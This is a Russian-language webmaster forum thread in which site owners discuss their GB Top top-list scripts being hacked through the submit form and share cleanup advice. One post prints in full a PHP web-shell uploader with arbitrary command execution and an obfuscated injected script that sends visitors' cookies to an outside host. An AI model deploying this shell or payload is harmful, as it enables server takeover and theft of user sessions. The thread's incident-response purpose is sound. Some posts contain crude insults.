Master-X
Форум | Новости | Статьи
Главная » Форум » Топы » 
Тема: (Лечение!) Ахтунг атакуют топы или дыра GB Top
цитата
21/01/11 в 18:29
 CrazyMen
Надо кому-то первому попробовать. Наверное это буду я icon_razz.gif Попытаюсь по крайней мере
цитата
25/01/11 в 21:53
 CrazyMen
Держите вторую волну icon_lol.gif Билять хоть как фиксили баг так и через мыло форму херачит. Нашел недавно установленный скрипт сука и его хлопнул хоть и версия 5.6. Не должно в форме для ничего кроме {name}[@]{domain}[.]{com} быть! Нет же! И все символы прошли и все. Смотрите удаляйте. Кстати у кого закинули бэкдор считайте что рут пароль просрали. И пока не удалите все файлы с шелами, то менять смысла нет.
ЗЫ последняя капля моего терпения.. icon_twisted.gif
ЗЫЫ Есть айпи этого пидорга может таго smail17.gif
цитата
26/01/11 в 11:17
 Дольчик ххх
мне этот насос тоже запихнул код в auxout+noref, статистика на морде поменялась на нули, сейчас по новой восстанавливаюсь ;(
цитата
26/01/11 в 17:41
 J_Geer
Нашел у себя тоже в auxout+noref скрипт почти на всех топах и опять лишние php файлы в datafiles.
На одном из топов нашел в datafiles вот такой файл .ftpaccess:

HideFiles ^\.(ftpaccess|php)$ user mysite0
PathDenyFilter ^\.(ftpaccess|php)$


И удаляйте auxout.dat в backupfiles, там тоже эта шняга сидит.

Что-то мне кажется, что пароли фтп факинг хакер попиздил... icon_sad.gif
цитата
26/01/11 в 23:28
 CrazyMen
J_Geer: Братко самое интересное он и твой рутовский пароль знает. Ломается один скрипт. Дальше через дыру вытягивает пароль рута и привет! Меняйте пароли после того как все проверите
цитата
27/01/11 в 00:35
 J_Geer
Ну конкретно в моем случае рутовский пароль я и асм не знаю - у меня все топы на виртуалах. Если дальше пойдет - придется саппорт напрягать...
На другом виртуале заменило еще и index.php, стоящие под 444... 29Kb вместо 10,8...
цитата
27/01/11 в 14:26
 bubon
Намедни чтото странное пыталось засабмиться. Мыло вот такое q@q.q>
Это оно?
цитата
27/01/11 в 20:40
 CrazyMen
J_Geer:Меняй права и удаляй index.pph обнов скрипт. Отписывай хостеру пусть ищет у тебя файл .php

bubon: Вполне возможно, что нащупывает пробъет или нет. Смотри аминку не покоробило изменением?
цитата
27/01/11 в 20:56
 bubon
Та вроде все нормально. Темплейты тоже не менялись.
цитата
27/01/11 в 21:05
 J_Geer
Индексы все поменял сразу же из локального бэкапа, вроде все лишние файлы *.php нашел... Поменял все пароли и поставил на templates chmod 555. Посмотрим, что будет...
цитата
27/01/11 в 21:16
 _4eburek
Есть идея не большая. А что если сабмит форму топа перенести в другое место какое нибудь. А сабмит проводить через свою форму которая будет чекать все поля на валидность и уже потом отсылать данные на форму которую куда нибудь в другое место зарыли или сразу в базу данных.
Или в чем именно проблема там ? Из за чего просачивается его гавно ?
цитата
27/01/11 в 21:31
 CrazyMen
J_Geer писал:
Индексы все поменял сразу же из локального бэкапа, вроде все лишние файлы *.php нашел... Поменял все пароли и поставил на templates chmod 555. Посмотрим, что будет...

возможно что морда обновлятся не будет
цитата
27/01/11 в 22:05
 J_Geer
Морда пишется в файлы main{category}.html в рут директории скрипта, насколько я понимаю. А из темплейтов только берется образец для заполнения. А вот редактироваться из админки темлейты точно не будут, надо будет 777 ставить на папку.
цитата
27/01/11 в 22:17
 CrazyMen
J_Geer: Я на своих права менял у меня морда не обновлялась
цитата
27/01/11 в 23:16
 J_Geer
Проверил - обновляется. 555 именно на фолдер templates стоит, а на сам фолдер, в котором скрипт стоит, должны быть права на запись, т.е. 777 или как минимум 755.
цитата
28/01/11 в 08:45
 Дольчик ххх
+1 _4eburek icon_smile.gif Хорошая идея! Хотя у некоторых овнеров есть скрипт, который автоматом самбитит во все его Топ листы, может он и есть, кто бы согласился выложить подобный скрипт в паблик?! ;)
цитата
28/01/11 в 11:29
 Alexandur
_4eburek: У скрипта жёсткая привязка к названию webmasters.php Т.к. у автора там ссылки.

Остальным - пользуйтесь clamav'ом, на freebsd, centos он должен стоять по умолчанию. Там нужны только три команды, даже я разобрался icon_smile.gif
whereis clamav - если есть, то:
freshclam - обновить базу
clamscan -r -i /usr/home/user/www/ – рекурсивное сканирование, т.е. сканирование в подкаталогах; показывать только инфицированные файлы

Остальным http://www.clamav.net/lang/en/download/ с инструкциями.

CrazyMen: свою проблему вбей в поисковик, там правится конфигурационный файл
цитата
28/01/11 в 12:09
 _4eburek
gimcnuk: Ну можно финт ушами сделать. Написать простенький скриптик свой вебмастерс (старый переименовать), через который принимать сабмиты, при апруве просто заменять скрипт на нормальный и своим скриптом туда данные редиректить. потом опять переименовывать топовый вебмастерс.пшп чтобы через него не сабмитили.
цитата
29/01/11 в 11:45
 CrazyMen
gimcnuk: Проверял по твоей методике не нашел ни одного вируса. Потом через ssh прсомтрел и нашел вредоносные скрипты. Так что не поможет такок действие ничем кроме как профилактики
цитата
29/01/11 в 15:29
 J_Geer
В принципе, вполне ожидаемый результат. Имхо больше смысла, если есть рут доступ (свой сервер или вдс-ка) прогнать поиском по содержимому файлов, взяв за строку поиска часть содержимого хакерских файлов. Что-то типа
grep -l ${"\x47\x4cO
grep -l x65\x76\x61
из рут директории сервера. Примерно так.
цитата
01/02/11 в 02:47
 J_Geer
Факин шит! На одном из виртуалов, где все уже вроде вычистил, опять объявился левый код. На этот раз на паре топов появился "пустой" мембер (мыло не приходило, хотя везде выставлено извещать), а memberfiles в файле member_name.dat сидел вот такой код:

<html>
<head>
<title>uploader</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<style type="text/css">
<!--
body {  font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px}
a {  color: #000000; text-decoration: none}
a:hover {  color: #000066; text-decoration: underline}
-->
</style>
</head>

<body bgcolor="#999999" text="#000000">
<center>
  <table width="700" border="0" bgcolor="#000066">
    <tr>
      <td>
        <table width="100%" border="0" bgcolor="#CCCCCC">
          <tr>
            <td>
              <p><font size="2"><b><font color="#FF0000">&nbsp;&nbsp;&nbsp;System:
                <font color="#000000">
                <? passthru("uname -a"); ?>
                </font><br>
                &nbsp;&nbsp;&nbsp;Our permissions: <font color="#000000">
                <? passthru("id"); ?>
                </font><br>
                &nbsp;&nbsp;&nbsp;Our locality: <font color="#000000">
                <? passthru("pwd"); ?>
                </font></font></b></font></p>
             
<pre>
<?php
// FILE UPLOAD
$uploaded = $_FILES['userfile']['tmp_name'];
if (file_exists($uploaded)) {
   $pwd_dir = $_POST['dira'];
   $real = $_FILES['userfile']['name']; 
   $destination = $pwd_dir."/".$real;
   copy($uploaded, $destination);
   echo "Uploaded process:";
   print_r ($_FILES);
   echo "FILE UPLOADED TO $destination";
} else {
    echo "&nbsp;&nbsp;No file uploaded";
}
?>     </pre> <form name="form1" method="post" enctype="multipart/form-data">
                <table width="100%" border="0">
                  <tr>
                    <td width="35%"><font size="2"><b>&nbsp;&nbsp;Browse file
                      to upload:</b></font></td>
                    <td width="65%">
                      <input type="file" name="userfile" size="45">
                    </td>
                  </tr>
                  <tr>
                    <td width="35%"><b><font size="2">&nbsp;&nbsp;Destination:</font></b></td>
                    <td width="65%">
                      <input type="text" name="dira" size="45" value="<? passthru("pwd"); ?>">
                      <input type="submit" name="submit2" value="upload">
                    </td>
                  </tr>
                  <tr>
                    <td width="35%">
                      <div align="right"> </div>
                    </td>
                    <td width="65%">&nbsp; </td>
                  </tr>
                  <tr>
                    <td width="35%"><b><font size="2">&nbsp;&nbsp;Command to execute:</font></b></td>
                    <td width="65%">
                      <input type="text" name="cmd" size="45" value="<? echo $_POST['cmd']; ?>">
                      <input type="submit" name="submit" value="execute">
                    </td>
                  </tr>
                  <tr>
                    <td width="35%">
                      <div align="right"> </div>
                    </td>
                    <td width="65%">&nbsp; </td>
                  </tr>
                </table>
              </form>
              <p>
                          <pre>
                          <?
                          // command output
                                if ($_POST['cmd']){
                          $cmd = $_POST['cmd'];
                          echo "$cmd executed...<br>";
                          passthru("$cmd");
                          }
                          else {
                          echo "No shell command executed";
                          }
                          ?></pre>
              <div align="right"> <font size="1"><b>2003 &copy; </b></font> </div>
            </td>
          </tr>
        </table>
      </td>
    </tr>
  </table>
</center>
</body>
</html>


и опять поменяло код в auxout+noref на

"><script>eval(String.fromCharCode(105,109,103,32,61,32,110,101,119,32,73,109,97,103,101,40,41,59,32,105,109,103,46,115,114,99,32,61,32,34,104,116,116,112,58,47,47,115,46,120,116,100,115,46,105,110,47,115,46,112,104,112,63,34,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59))</script><a href=http://your_noref_url \

В остальном топы работали нормально, темплейты под 555 и индексы целые. На другом виртуале пока все в порядке.
Опять вычистил все и поменял права на auxout.dat на 444. Хрен с ней, со статистикой, задрало уже чистить это г...но через день.
Видимо, эта хрень все-таки через сабмит-форму лезет. Видимо надо менять сабмит на чисто мыльный...
цитата
01/02/11 в 08:53
 J_Geer
Переделал для сабмита форму обратной связи. Родной webmasters.php просто подменяется этим файлом.
Эта форма не имеет никакого доступа к скрипту, а просто шлет на заданное мыло данные трейдера. Которые потом вбиваются ручками через админку. Е-мейл, макс. длина полей и заполненность проверяются, единственное, чего не осилил со своим "РНР со словарем" - проверку урла на валидность. Заплутал в регулярках. Кто шарит, подправьте плиз в строке 137.
В общем, если кому интересно, смотрим и берем здесь
цитата
01/02/11 в 08:56
 Дольчик ххх
J_Geer - Интересный подход! smail54.gif Спасибо за скрипт! ;)
цитата
01/02/11 в 19:20
 AndreXXX
Меня на 4 страницу данной топика антивирь не пускает - блокирует, чего вы там понаписали?
цитата
01/02/11 в 20:48
 CrazyMen
AndreXXX: Ты не должен был сюда заходить! Мы еще тебе сюрприз недописали в коде smail101.gif. Часть кода видно не потерли вот орет на него
Стр. « первая   <  2, 3, 4, 5, 6  >  последняя »


Эта страница в полной версии